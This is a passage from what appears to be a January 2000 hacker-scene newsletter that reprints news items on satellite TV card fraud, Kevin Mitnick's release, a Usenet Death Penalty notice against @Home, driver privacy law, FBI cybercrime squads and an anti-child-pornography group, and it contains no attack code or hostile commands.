NEW YORK (January 12, 2000 6:51 a.m. EST http://www.nandotimes.com) - CBS News uses digital technology to project certain images during its shows, including a network advertisement that covered the NBC Jumbotron during its New Year's Eve coverage in Times Square, The New York Times reported Wednesday.
The technology, which has become common in sports and entertainment programs, has generally not been used on news shows. However, CBS News is regularly using the technology on its "The Early Show" and "48 Hours" programs, according to CBS news executives cited by the newspaper. It was also used on "The CBS Evening News with Dan Rather" on Dec. 30 and Dec. 31. During the latter broadcast, the image of a billboard ad for CBS News was inserted over a Budweiser ad and the large NBC screen located under the New Year's ball, the Times reported. Eric Shapiro, the director of the "CBS Evening News" and CBS News Special Events, said he might use the technology again on the "Evening News." He said the news division examines each case for impropriety before putting virtual logos on the air. "The technique, I find, works best if you put it someplace where there is intended to be something," he said. Rather knew about the use of the virtual technology during the New Year's Eve broadcast and did not protest the practice, Shapiro said. "But he did not know about it in advance," he added. Among other places, the news show logos have been inserted on the sides of buildings, on the back of a horse-drawn carriage in Central Park and in the fountain outside the Plaza Hotel near the park. "The Early Show" has used the technology almost daily since its Nov. 1 debut, making it appear that a large CBS advertisement is attached to the General Motors building, where the show originates. The use of similar technology sparked controversy in 1994, when ABC journalist Cokie Roberts appeared in front of a picture of Capitol Hill. Wearing a coat but actually in the network's Washington bureau, Roberts was introduced by ABC News anchor Peter Jennings as reporting from the Capitol. Neither network viewers nor Jennings knew that Roberts was actually indoors. Both Roberts and Rick Kaplan, then executive producer of "World News Tonight," were reprimanded, and the network issued an on-air apology. 
Representatives for NBC, ABC and Fox said their news departments did not use digital technology during news broadcasts. A CNN spokeswoman told the Times she knew of no time the technology had been used by the cable network.

@HWA

95.0 Direct TV Service Stolen in Illinois 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

An Illinois man has been arrested and charged with two counts of computer fraud, a Class 4 felony punishable by up to three years in prison, for allegedly rigging Direct TV satellite receivers. This crime was investigated by the year-old Illinois State computer crime unit. (Something tells me that this guy was caught because he was stupid (something blatant like putting an ad in the paper) rather than any remarkable skills displayed by the cyber crime squad.)

Lexis-Nexis
http://web.lexis-nexis.com/more/cahners-chicago/11407/5369541/3

SECTION: State and regional
LENGTH: 478 words
HEADLINE: Man charged in satellite signal thefts
BYLINE: Joe Mahr
DATELINE: SPRINGFIELD
BODY:

Move over cable companies -- satellite programming has also become a target of TV channel thieves. This week a Sangamon County man became the first person in the state arrested by the Illinois Attorney General's office for allegedly rigging satellite TV receivers. Larry Anders, 46, of Auburn was charged Friday with two counts of computer fraud, a Class 4 felony punishable by up to three years in prison. Anders allegedly charged area Direct TV subscribers $100 each to reprogram their receivers to automatically get all of the pay-per-view channels offered by the satellite service. Authorities believe such crime is growing as satellite TV services expand their reach into a market previously dominated by cable TV. Programming fraud is nothing new. For years, cable TV companies have fought viewers who pay for only basic services but used illegally ''descrambled'' receivers to get the premium programs.
Now, similar efforts are made with the satellite receivers, which use computer cards to control what channels customers can access. The technically savvy with the right computer equipment can reprogram the cards to allow access to every channel, regardless of the customer's subscription level. ''It's becoming more widespread because of easy access to the software via the Internet,'' Attorney General Jim Ryan said in a prepared statement. It's also part of a broader application of computers in all sorts of crime, ranging from child pornography to credit card fraud. ''With the increase in technology, we're seeing it applied in the criminal arena,'' said Sangamon County assistant state's attorney Steve Weinhoeft. Satellite providers try to improve their security with every new model of receiver, but some people still find ways to reprogram the cards. That has caught the attention of Ryan's computer crimes unit, which was formed last year. ''We are aware that there is a group of people working to decode the new cards that come out, and we're going to be concentrating on that,'' said Ryan's deputy chief of investigations, Chuck Redpath, who also is a Springfield alderman. In Anders' case, he allegedly sold a reprogrammed card to an undercover investigator from the attorney general's office Thursday night. Redpath said he's not sure how many people bought such reprogrammed cards from Anders, but those people could face a charge of theft of services, a Class A misdemeanor punishable by up to a year in jail. And according to Redpath, Direct TV's own fraud investigators plan to double-check the connections of its area subscribers to ensure no one is stealing signals. ''I'm sure this is going to send shock waves to people who have had their satellite dishes altered because if they catch you, you can be prosecuted,'' Redpath said. Joe Mahr can be reached at (217) 782-6882 or mahr(at)sj-r.com. 
@HWA

96.0 Security Book Released on Net for Free 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

In an effort to provide administrators with high quality and timely online technical content, Windows NT magazine has decided to place their book Internet Security with Windows NT on the internet for free. The book will be updated with new content as appropriate.

Windows NT Magazine
http://www.ntsecurity.net/forums/2cents/news.asp?IDF=200&TB=news

Call me dense, but I went to this site eagerly interested in checking out this book and couldn't for the life of me bring it up, perhaps it's a Netscape foible or perhaps they just plain fucked up, ya I clicked on the right places, I'll try it with MSIE and let you know .. hang on

@HWA

97.0 States Can't Sell Private Info 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

The Driver's Privacy Law, a 1994 federal law limiting the sale of personal information by states, has been supported by the Supreme Court. The precedent-setting case established that State-owned databases are subject to federal regulation as interstate commerce just as any other commodity. Such databases would include personal, identifying information from drivers' licenses and motor vehicle registrations. (This case has implications regarding not only future state run databases but commercial ones as well.)

ZD Net
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2421349,00.html?chkpt=p1bn

Wired
http://www.wired.com/news/politics/0,1283,33611,00.html

Jan 12, 2000 12:01 PM PT

Feds allowed to limit sale of State databases

In a precedent-setting case, the Supreme Court upheld the Driver's Privacy Law, a 1994 federal law limiting the sale of personal information by states.
The Court held that personal, identifying information from drivers' licenses and motor vehicle registrations is a "thing in interstate commerce" that can be regulated by Congress like any other commodity. States had argued that the law violated their sovereign rights, but the Court found, the law regulates State databases as those owned by any other entity. "The Supreme Court recognizes that there is a market in personal information, and it has strongly affirmed Congress' authority to regulate that market to protect privacy," said Jim Dempsey, senior staff counsel for the Center for Democracy and Technology. "If Congress can establish privacy rules to regulate personal information in state government databases, it can surely regulate commercial databases."

-- Robert Lemos, ZDNet News

-=-

Wired;

DMV Can't Sell Personal Info
by Declan McCullagh
12:55 p.m. 12.Jan.2000 PST

Motor vehicle agencies can be restricted from selling the personal information on drivers licenses, the US Supreme Court unanimously ruled Wednesday in a widely anticipated decision. The justices said that a federal law restricting departments of motor vehicles from distributing their data to corporations and direct marketers without permission is constitutional, and overturned an earlier appeals court decision. Congress enacted the Driver's Privacy Protection Act (DPPA) in 1994, but South Carolina attorney general Charlie Condon sued the federal government to overturn the measure. He argued it violated the principles of federalism and separation of powers, essentially saying the matter was best decided by state governments and that the feds should butt out. The Supreme Court strongly disagreed. "The DPPA does not require the States in their sovereign capacity to regulate their own citizens. The DPPA regulates the States as the owners of databases," wrote Chief Justice William Rehnquist in the 18 KB decision.
Legal scholars say what makes the case important are not its privacy implications, but how it affects the balance of power between state and federal governments. "This is part of a battle that was started in the New York case about what Congress can and cannot order states to do," said David Post, a professor of law at Temple University law school. "The real issue is whether Congress can pass a regulatory statute and force the state governments to enforce it." In New York v. United States, the Supreme Court in part upheld and nixed a 1985 law that regulated state disposal of low-level radioactive waste. Eugene Volokh, a law professor at UCLA, said the Supreme Court has maintained the status quo. "It's not a surprise that this is a 9-0 case. It's long been understood that the federal government has the power to control commerce, including commerce by states, including the sale of information," says Volokh. "This just reaffirms that. That court clarified something that had been assumed all along." Volokh said the 4th US Court of Appeals, which concluded the DPPA violated constitutional principles of federalism, has been more inclined to side with states' rights than other circuit courts. The DPPA says that state governments may not "knowingly disclose" such private information, but there are many exceptions and loopholes. For instance, "any government agency" can obtain drivers license information. So may researchers, private investigators, insurance companies, or impound yards. Marketers may obtain the data as long as states provide drivers "an opportunity, in a clear and conspicuous manner, to prohibit such uses." Privacy and conservative groups applauded the ruling. "My initial reaction is that I'm surprised it was unanimous, given that Rehnquist is so strong on states' rights. I would have [anticipated] that he would have ruled in favor of the states. 
But I'm pleasantly surprised that it was unanimous in favor of the DPPA," said Lisa Dean, vice president of the Free Congress Foundation.

@HWA

98.0 Mitnick Free Next Friday 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Kevin Mitnick is set to be released from federal prison next Friday. While his family and supporters will celebrate the occasion, what sort of life can Kevin look forward to? Will the court order preventing him from accessing computer equipment help in his reform? Kevin Poulsen examines these questions in his ZD Net article.

Chaos Theory
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2128328,00.html

Mitnick’s Digital Divide

It’s the year 2000, and Kevin Mitnick is going free. The problem is, he’ll be trapped in 1991.

By Kevin Poulsen
January 12, 2000

On Friday, January 21, hacker Kevin Mitnick will go free after nearly five years behind bars. But when he walks out the gates of the Lompoc federal correctional institution in California, he'll be burdened with a crippling handicap: a court order barring him for up to three years from possessing or using computers, "computer-related" equipment, software, and anything that could conceivably give him access to the Internet. These anti-computer restrictions are even more ridiculous today than when I faced them upon leaving federal custody in June, 1996. In the wired world of 2000, you'd be hard pressed to find a job flipping burgers that didn't require access to a computerized cash register, and three years from now McDonald's applicants will be expected to know a little Java and a smattering of C++. Since Mitnick's arrest in 1995, the Internet has grown from a hopeful ditty to a deafening orchestral roar rattling the windows of society.
The importance of computer access in America has been acknowledged by the White House in separate initiatives to protect technological infrastructure from "cyberterrorists," and to bridge the so-called digital divide between information haves and have-nots. "We must connect all of our citizens to the Internet," vowed President Clinton last month. He was not referring to Kevin Mitnick. Mitnick, dubbed the "World's Most Notorious Hacker" by Guinness, pleaded guilty on March 26 to seven felonies, and admitted to cracking computers at cellular telephone companies, software manufacturers, ISPs, and universities, as well as illegally downloading proprietary software. Though he's never been accused of trying to make money from his crimes, he's been in and out of trouble for his nonprofit work since he was a teenager. So, the theory goes, keeping Mitnick away from computers will deprive a known recidivist of the instruments of crime and set him on the road to leading a good and law-abiding life. I've heard that theory from prosecutors, judges and my (then) probation officer. They all compare computers to lock picks, narcotics, and guns -- everything but a ubiquitous tool used by a quarter of all Americans and nearly every industry. Mitnick, we should believe, will be tempted in the next year or so to crack some more computers and download some more software. But when the crucial moment comes for him to commit a felony that could land him in prison for a decade, his fingers will linger indecisively over the keyboard as he realizes, "Wait! I can't use a computer! My probation officer will be pissed!" The fact is, if Mitnick chooses crime, he won't be deterred by the 11 months in prison that a technical supervised release violation could carry. These conditions only prevent him from making legitimate use of computers. Mitnick's rehabilitation is up to him.
But the system shouldn't throw up obstructions by keeping him away from the mainstream, on the sidelines, and out of the job market. His probation officer will have the power to ease his restrictions, perhaps by allowing him to get a computer job with the informed consent of his employer. That would be a good start. January 21 will be a happy day for Mitnick, his family, and friends. But getting out of prison after a long stretch carries challenges too. Nobody is served by stranding the hacker on the wrong side of the digital divide.

@HWA

99.0 Internet Banned From Jewish Homes 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Dildog

The ultra-orthodox Council of Torah Sages (an important leadership group in the Jewish community, based out of Israel) signed a ruling banning the Internet from the homes of all Jews. The ultra-orthodox constitute less than 1% of the total Jewish community in Israel, however, it is unknown how much influence over the rest of the community the council has.

Wired
http://www.wired.com/news/culture/0,1284,33583,00.html

Fahrenheit 451, Jerusalem Style
by Tania Hershman
3:00 a.m. 13.Jan.2000 PST

JERUSALEM -- The Internet ban issued by leading ultra-Orthodox rabbis last week has not prompted a great outcry within Israel's ultra-Orthodox community, where television was outlawed decades ago. "There needed to be a ban," says Deborah Spier, the mother of nine children aged between 2 months and 15 years who stopped to read the announcement of the ruling posted up around Jerusalem's ultra-Orthodox Mea Shearim neighborhood. "Children use the computer at 2 a.m. and you have no idea what they are doing. You can't control it." While she has a computer (but no television) at home, Spier's family is not and has never been connected to the Internet. Her children don't mind.
"I have a teenage son who enjoys computers and has a lot of games, but the children themselves felt that it was taking over," she said. "You can say that you are denying children, but they have other ways of finding information. There are libraries." The ruling, signed by 30 rabbis from different ultra-Orthodox communities, expressly forbids Internet connections at home and states, in fact, that "the computer should not be used for entertainment at all." However, those "whose livelihood depends on it" are allowed access to the Internet in the workplace, with "the responsibility not to let others use it." Is its aim simply to shield children from unsuitable material? "I don't think it is only for children," says Spier, but blushes rather than mention who else might be in need of "protection" and from what sort of online temptation. Chaim Mor, who runs the Torah Scholar Software store on a cobbled Mea Shearim shopping street, agrees that it is not just children who are perceived to be at risk. "Children range in age up to 120," he says. He does not believe this ruling is controversial. According to him, many ultra-Orthodox homes have PCs, but few have Internet connections. "The people that have the Internet have it for work-related reasons," he said. "A lot of people are involved in the computer field or people want access to Jewish and Torah sites." Torah Scholar Software itself sells some of its merchandise online through Jewish Software, just one of thousands of Jewish sites. Others are the Shema Yisrael Torah Network and Jewish Chat. These sites demonstrate that the Internet's value for disseminating information is not lost on the Jewish community. Aish HaTorah, for example -- an Orthodox organization with the stated purpose of "outreach" to non-observant Jews -- has a Web site filled with all types of religious content, from the Jewish take on Y2K to online religious study courses, and even an "Ask the Rabbi" feature. 
"I definitely understand the concerns that the religious world is feeling," says Aish HaTorah's director of development, Rabbi Ephraim Shore. "The potential for damage, especially for young people, is huge. And this is not confined to the religious world. The No. 1 use of the Web today is pornography. Do most parents want to make this available to their children?" "However," he continued, "at the same time, the upside potential for learning and education is probably equally as huge. While I understand where the [orthodox] rabbis are coming from, I believe that there are ways to moderate and control Internet use using different programs available." One way to do this may be through ISPs such as Koshernet, which labels itself a "safe and kosher link to the Information Superhighway." Koshernet only allows subscribers to access sites that have already been passed by their site-checkers. Currently, Koshernet is only available in the US and Canada, but it is expanding to the United Kingdom and France. It expects to be available in other European countries and Israel by the end of 2000. "The Koshernet was established to give a solution for anyone who needs to use the Internet for work and business, but doesn’t want to be exposed to offensive material," said president Jacob Gubits. "Since our establishment 3 years ago, we have the full support of the rabbinical authorities of different communities." Regardless of whether Koshernet takes off, Aish HaTorah is expanding its Web presence and hopes for one million visitors a month when the new site ("the Amazon.com of the Jewish World," boasts Shore) is launched in a few weeks. "I think personally that to ignore the Internet is to put blinders up. It is going to be there anyway," he says. "I think that the opportunity for Jewish education on the Web may be the biggest opportunity for the Jewish people in years -- maybe ever. The potential for outreach is endless. We have never had that opportunity before. 
@HWA

100.0 NJ Teens Steal CC Numbers 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Four teenagers in New Jersey have been arrested and charged with fraud, conspiracy, credit card theft and receiving stolen property. The boys, aged 14 to 16, tricked customers of AOL into revealing their personal information including credit card numbers. The teens then used the numbers to order items that were shipped to unoccupied houses.

Nando Times NJ Teens Steal CC Numbers
http://www.nandotimes.com/technology/story/body/0,1634,500153859-500189471-500804836-0,00.html

N.J. teens charged with tricking Internet users out of credit card numbers

Copyright © 2000 Nando Media
Copyright © 2000 Associated Press

GALLOWAY TOWNSHIP, N.J. (January 13, 2000 7:00 a.m. EST http://www.nandotimes.com) - Four teenage boys have been charged in what police say was an Internet scam using stolen credit card numbers to defraud hundreds around the country. The boys, ages 14 to 16, obtained credit card numbers by tricking America Online and Earthlink subscribers into transmitting their account information to the teens over the Internet, Detective Jay Davies said. The information allowed the teenagers to obtain the passwords, addresses, phone numbers and credit card numbers of people in New Jersey, New York, Pennsylvania, Ohio, Florida, Nebraska, Texas and elsewhere. The alleged scammers then used the credit card numbers to make about $8,000 in purchases, arranging to have the merchandise delivered to unoccupied homes, according to Davies. Police were alerted when John Bertino of Galloway Township complained that charges for $1,000 in "kids stuff" - including a Sony Playstation - had shown up on his Visa credit card.
America Online spokesman Rich D'Amato said Wednesday that the company warns subscribers against giving out their passwords or other sensitive information and that AOL staffers will never ask a subscriber for a password or billing information. The teenagers, whose names weren't released, are all students at the same high school. They were arrested between Dec. 23 and Jan. 6 and charged with fraud, conspiracy, credit card theft and receiving stolen property.

@HWA

101.0 Radius Net takes over Attrition Mirrors 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by audit

Although Attrition.org is temporarily down due to a crashed hard drive, Radius.net has agreed to host defacement mirrors at their site until Attrition can be repaired. The attrition staff will still be on hand to mirror the defacements but they will be hosted at www.radiusnet.net/mirror. Notification of defacements can be sent to hacked@radiusnet.net.

Radius.net
http://www.radiusnet.net/mirror

@HWA

102.0 New Ezines Available 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Hell and Xenos

There is a new Spanish e-zine available called Digital Rebel. Issue #3 of Digital Defiance has also been released.

Digital Rebel
http://www.digitalrebel.net/heh/

Digital Defiance
http://digital-defiance.hypermart.net

@HWA

103.0 FBI to Beef Up CyberCrime Investigation Abilities 01/15/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Fed

The National Plan for Information Systems Protection, released earlier this week by President Clinton, details plans for the FBI's National Infrastructure Protection Center (NIPC) to establish a National Infrastructure Protection and Computer Intrusion Program in the FBI's counter terrorism division.
The FBI plans to comply with this directive with the formation of new investigative teams specializing in computer intrusions and attacks at all 56 of its field offices around the country. At least one computer forensics examiner will also be assigned to each field office.

Federal Computer Week
http://www.fcw.com/fcw/articles/web-fbi-01-14-00.asp

The full text of Clinton's cybersecurity plan can be viewed and downloaded here:
http://www.ciao.ncr.gov

FBI beefs up cyberagent squads nationwide

BY Bob Brewin
01/14/2000

The FBI plans to reinforce its mission to counter cyberattacks with the formation of new investigative teams specializing in computer intrusions and attacks at all 56 of its field offices around the country. The agency also plans to assign at least one computer forensics examiner to each field office. The National Plan for Information Systems Protection, released on Jan. 12 by President Clinton, outlines plans for the FBI's National Infrastructure Protection Center (NIPC) to establish a National Infrastructure Protection and Computer Intrusion Program in the agency's counterterrorism division. The NIPC is charged with centrally managing the nation's defense of telecommunications systems, railroads and electric power systems against attacks. The plan calls for computer-intrusion squads to conduct network intrusion detection, respond to threats, collect intelligence and conduct counterintelligence investigations. The FBI also plans to expand its training program to produce technically savvy computer investigators, and will provide that training to federal law enforcement personnel as well as state and local agencies. The NIPC trained 170 FBI agents and 17 personnel from other law enforcement agencies in 1998, and by the end of this year will have trained an additional 500 law enforcement officers.
The NIPC, according to the president's plan, wants to train one computer-intrusion investigator and at least one trainer from state-level investigative agencies in each of the 50 states and Washington, D.C.

@HWA

104.0 UDP Called For Against @Home 01/15/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by the.new.guy

A USENET Death Penalty (UDP) has been called against @Home effective 17:00 Tuesday, January 18. The result of the death penalty would be that all @Home Users are about to have all of their news postings BANNED from all of USENET due to the continual spamming by its customers. @Home has responded to the UDP by claiming that the problem is customers who set up proxies and that they will work to resolve the problem.

Wired
http://www.wired.com/news/technology/0,1282,33638,00.html

@Home Statement - via Deja.com
http://www.deja.com/getdoc.xp?AN=571636137

Wired;

Dead ISP Walking
by Andy Patrizio
2:10 p.m. 13.Jan.2000 PST

Anti-spammers fed up with ExciteAtHome's blasé efforts to prevent unsolicited emails are threatening to block messages coming from the cable Internet provider. The company's AtHome networking group is the latest ISP threatened with a Usenet Death Penalty (UDP) for repeatedly failing to keep spam from flooding Usenet newsgroups. ExciteAtHome has until 18 January to clean up its act. Considered a last resort, a UDP is issued by the frustrated voluntary group of network administrators and spam fighters after months of complaints fall on deaf ears. An ISP has five business days to respond to the death penalty warning. Should the provider fail to act, a message is sent out to every ISP that all Usenet postings from the offending ISP are to be deleted, whether they're spam or not. "It does apply pressure on the provider to do something, often in instances where nothing is being done," said David Ritz, a Milwaukee resident and one of the many spam-busters who has called for UDPs in the past.
"The solutions are not easy, they are quite technical, and it will cost them some money, but it won't cost them as much money as bad publicity will cost them," Ritz said. UDPs will continue to be used to get the attention of management, he said. "The grunts at the lowest level are aware of the problem but can't get the attention of management," he said. "[Only] the threat of [a UDP] will get their attention." In this case, it worked. ExciteAtHome officials posted a note on news.admin.usenet.net-abuse, a Usenet newsgroup where the UDP was first discussed. The posting stated that due to improperly installed proxy software, its subscribers were turned into relay conduits for spam, and spammers took advantage of the faulty configuration. Most of the AtHome abuse comes from "open" proxy servers. Normally, AtHome news servers are only accessible to AtHome subscribers, but an open proxy server means anyone can connect to it and use it to post messages on Usenet. "As of today, we are stepping up our involvement and taking more aggressive action by performing frequent network-wide scans of our customer base to target proxy servers," wrote David Jackson, manager of network policy management at ExciteAtHome, in Mountain View, California. "We are committed to promoting better AtHome participation on the Usenet, and we are in the process of modifying our current news product and news architecture." Ritz is cautiously optimistic. He plans to request that the UDP be given an extension of two to four weeks to give ExciteAtHome time to implement all of the things it needs to get control of the problem. "I believe they are taking this extremely seriously," he said. "I hope AtHome will come out of this as a respected member of the community, which it should if they do what's necessary." Ritz is part of a team of spam fighters, whom he describes as overworked, "underslept," and volunteer. "Every one is working very hard to put themselves out of a job. 
There's nothing they'd like more than to not be needed," he said. To activate the death penalty, the groups send out cancellation messages that are replicated across Usenet news servers to delete messages identified as spam. Usenet is the pioneering message board system of the Internet for open discussion of any and all subjects. In recent years, Usenet has been abandoned in favor of message boards on Web sites for a number of reasons, spam not the least of those reasons. One of the worst spammers Ritz ever saw posted 120,000 messages in a 24-hour period. Ritz said the top three current offending sources for spam are AtHome servers, and that 25 percent of all traffic from AtHome's news servers is spam. To qualify as "spam," a message has to be posted to 20 or more newsgroups. The extremely effective UDP has been issued against America Online, CompuServe, Erols.com, TIAC, BBN Planet, and Netcom, according to the UDP FAQ. In every case, the ISP dealt with the problem before a UDP was issued. The worst offender was UUNet, which had no acceptable use policy and did not respond to months of complaints. At the time the UDP was issued in 1997, 40 percent of all Usenet traffic was spam, much of it originating from UUNet. To make their point, in early 1999 the spam busters took a week off and allowed the spam to flow freely. The end result was news servers all over the world suddenly filled up, causing disk-full errors. "This was so dramatic it had the single greatest effect on reducing the volume of spam," said Ritz, who claimed it also increased support for UDPs. "Admins became aware of just how desperate and drastic the condition was."

@HWA

@HOME Statement:

Subject: [usenet] Usenet Death Penalty Notice: @Home Network
Date: 01/12/2000
Author: David Ritz

-----BEGIN PGP SIGNED MESSAGE-----

[posted and mailed]
[Please direct follow ups to news.admin.net-abuse.usenet.]
Posted to: news.admin.net-abuse.usenet news.admin.net-abuse.policy news.admin.net-abuse.bulletins news.admin.announce
Mailed to: abuse@corp.home.net news@corp.home.net noc@corp.home.net abuse@rogers.home.net Internet.Abuse@shaw.ca David Jackson

Over the past year, @Home Network has been the source of vast quantities of Usenet spam. Despite countless complaints, reports, and phone calls, @Home Network shows no inclination towards stopping this ongoing abuse. By December, 1999, the situation reached unconscionable levels of abuse. Currently there is still a huge volume of EMP spam originating both directly from @Home's @Home grown spammers and through the countless open proxies to their news servers. These open proxies present a very clear threat to the entire Usenet community at large. The data included in the following article shows a trend of persistent and increasing abuse.

} Newsgroups: news.admin.net-abuse.usenet,news.admin.net-abuse.misc
} Date: Sun, 9 Jan 2000 22:20:54 -0700
} From: David Ritz
} Reply-To: David Ritz
} To: abuse@corp.home.net, news@corp.home.net, abuse@rogers.home.net,
} Internet.Abuse@shaw.ca
} cc: David Jackson
} Subject: [RFD] @Home UDP Proposal: A Request for Remedial Action
} Message-ID:
} Followup-To: news.admin.net-abuse.usenet

Because of this lack of response to serious, ongoing problems, even when they have been pointed out repeatedly, a full active Usenet Death Penalty will go into effect at the close of business, 17:00 PST, on Tuesday, 18 January 2000 (19 Jan 2000 01:00:00 GMT). Please see the Usenet Death Penalty FAQ, . This action will affect all traffic posted to the @Home Network news servers, having a Path stamp of *.*.*.home.com.POSTED. It is sincerely hoped that @Home Network. will take appropriate measures to stem the flow of abuse from their network before this time. Any assistance which they may require will be gladly provided.
Should this action become unavoidable, sites not wishing to participate may alias out the pseudosite homeudp!. Sites not wanting to participate in any active UDPs may alias out the pseudosite !udpcancel!.

- --
David Ritz
Finger for PGP Public Keys
Fight against spam & spammers http://spam.abuse.net
Outlaw Junk Email. ++++++ Join CAUCE ++++++ http://www.cauce.org
** Be kind to animals - Kiss a shark. **

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2
Comment: Finger:dritz@primenet.com for public keys

iQCVAwUBOHwYJNzLrWGabIhRAQErcwQAhZS/JXY+TGBrxXsdLVgHss38OV0r9oVN
ix1UodLsbn0upUP8u3xACKREfxySW/kK/uuyz2C5DwlhB4OM6fN2w0H21QbGHmIe
XNvBZq2ap1FQlHYCByO/5m7bPyi0xrYbW+R4XLo20NMEqSFxTuvgT4UBHMKVebh1
wu++QUc3pGw=9Vdy
-----END PGP SIGNATURE-----

@HWA

105.0 ACPM Changes Name and Stops Intrusions 01/15/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by lawless

Originally featured on HNN several months ago, the ACPM (Anti Child Porn Militia) has evolved into an organization which uses technical, though legal and ethical techniques to combat the growing child pornography trade on the internet. Changing their name to ACPO (Anti Child Porn Organization) the group hopes to move away from "Hacktivism" towards a hack-free methodology to identify and shut down child pornography traders and their sites.

ACPO
http://www.antichildporn.org/site/html/news.html

LATEST NEWS AND UPDATES

January, 13, 2000

Official press release from ACPO:

Hacking to Stop Child Pornography -- Committing a Felony to Stop A Felony.

Child pornography is obscene evidence of a heinous act. Yet, there are those who enjoy viewing, collecting, and trading pieces of it. Guess what? The Internet is their new medium of choice. So what is to be done about it? What *can* be done about it? Seemingly, nothing. How can a site located in a country, with inadequate laws to prohibit child pornography sites, be shut down?
The ACPO says NO to those who say hacking is the solution.

"To Hack, or Not to Hack -- For That is the Question."

Natasha Grigori was the parent of a group dedicated to the disabling of child pornography web sites. The group's efforts achieved mixed results, as Natasha explains: "We were able to shutdown sites, but they would just come up elsewhere. They would come up more secure than before. We were winning battles, but losing the war." Despite great amounts of effort on the part of ACPM (Anti ChildPorn Militia - the original group) advocates, Grigori was unable to achieve satisfactory results. Despite a warm reception off the record, crucial support companies were not willing to put themselves at risk by working with hackers. "We couldn't fight a felony with a Felony.", says Natasha. "We had to change. We had to become Legit." Then the Anti ChildPorn Organization was founded March 1 1999, after months of evolving in the ACPM's philosophy and organization.

Is ACPO a Hacker in Sheep's Clothing?

The problems which entailed the usage of computer hacking to stop child pornography ran deeper than internal philosophy, however. Law enforcement agencies were reluctant to deal with a hacking group. The reluctance to deal with hackers stemmed from a mistrust of hackers, and a fear that the new socially conscious hacking was just a new attempt to pull the wool over the eyes of the public.

A New Hope:

After the shift into an entirely legal movement the ACPO shifted its technological energies away from hacking, towards the problem of identifying who the people are who provide child pornography sites as well as identifying those individuals who subscribe to these services. "It's a simple matter of supply and demand.", explains Natasha, "If we only attack the supply, then a new supply will move in to fill the demand. Our approach will target those who supply the child pornography and the patrons of the suppliers."
To these ends the ACPO has embarked on projects to create international legal partnerships, and to develop information warehousing tools to gather, process, and interpret large amounts of information in an attempt to identify the real world individuals behind the child pornography trade.

ACPO is also taking a pro-active approach on child pornography by working with education partners to educate students about child abuse and the resources available to them.

ACPO will be lobbying government for tougher laws on child pornography and its communication via the Internet.

For those who send or receive child pornography, Natasha has a warning: "None of you are safe. We will find and stop you."

About ACPO:

The AntiChild Porn Organization is an international, non-profit group with over 500 members, government and corporate partners. ACPO is defining the battleground for what will be a predominantly high-tech and legal battle against child pornography. The ACPO web site is located at www.antichildporn.org.

January, 12, 2000

Added a link to pedowatch, one of the oldest groups fighting child porn on the Internet. Thank you for their terrific support!

January, 7, 2000

I will temporarily be the webmaster for ACPO. I'd like to thank, in the name of ACPO head office, all the job done by Kissblade. Feel free to contact me for any questions.

Deepquest

January, 5, 2000

My turn: after a few months, as Webmaster, Site Designer and BBS Administrator (and site sponsor), I sign off....I wish you good luck.

KissBlade

December, 13, 1999

ACPO was just given 9 cases of COMPUTER COP http://toughcop.com Thanks for the donation, and all your help and upcoming assistance.

December, 8, 1999

A special note from Natasha: I would like to take this opportunity to publicly acknowledge the very special contribution from http://thetrainingco.com. They hosted us at their Techno-Security Conference and introduced us to many key people who can make a DIFFERENCE.
I am also humbled and pleased to announce that Jack Wiles and Don Withers have agreed to become working members and ACPO Directors. Thank you, gentlemen, we welcome your support in helping the children.

December, 2, 1999

A producer on the Sally Jesse Raphael Show in New York contacted us for an interview. They are doing a show on Dec. 14th on Sex Crimes on the Internet. We turned down that interview on Dec 6th. We need to finish up our Media Kit first and we are looking for a more sophisticated forum.

December, 1, 1999

Award for this site! from Political Site of the Day

"Nice job! Congratulations, and thanks for making the Web a more informative and interesting place to visit. We've been spotlighting sites for over three years, and we're glad to add you to our library."

Wayne Kessler
Political Site of the Day

November, 15, 1999

Secure Data Technologies Corp. has agreed to verify our reports and add that information to the National Data Base. We will also have access to that DB.

November 1999

site moved-> new webhost ....

October, 20-23, 1999

TheTrainingCo.com http://www.thetrainingco.com Thanks Jack Wiles and everyone that has offered their help and are helping ACPO. Shouts out to Doug Stead http://www.eap.ca for graciously speaking for ACPO, and agreeing to at the April 2000 Conference.

October, 17, 1999

After a wild year on the ACPO team, I am signing off. Just want to say thanks to those who contributed, and wish ACPO success.

cylent1

October, 3, 1999

Trip to speak with programmer. ACPO had a problem that needed solving: a ChildPorn BBS...We met with Domino about creating a spider, to compile information for ACPO. It was a successful meeting and within a month, Domino created the BBSCreep. The information is being sent to the authorities.

Update September, 29, 1999

Check the Resource Page - new, very informative links and new Banner !
September, 20-24, 1999

New York City trip to meet with The Cyber Angels http://www.cyberangels.org

@HWA

106.0 GCHQ Wants a Few Good Cryptographers 01/15/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

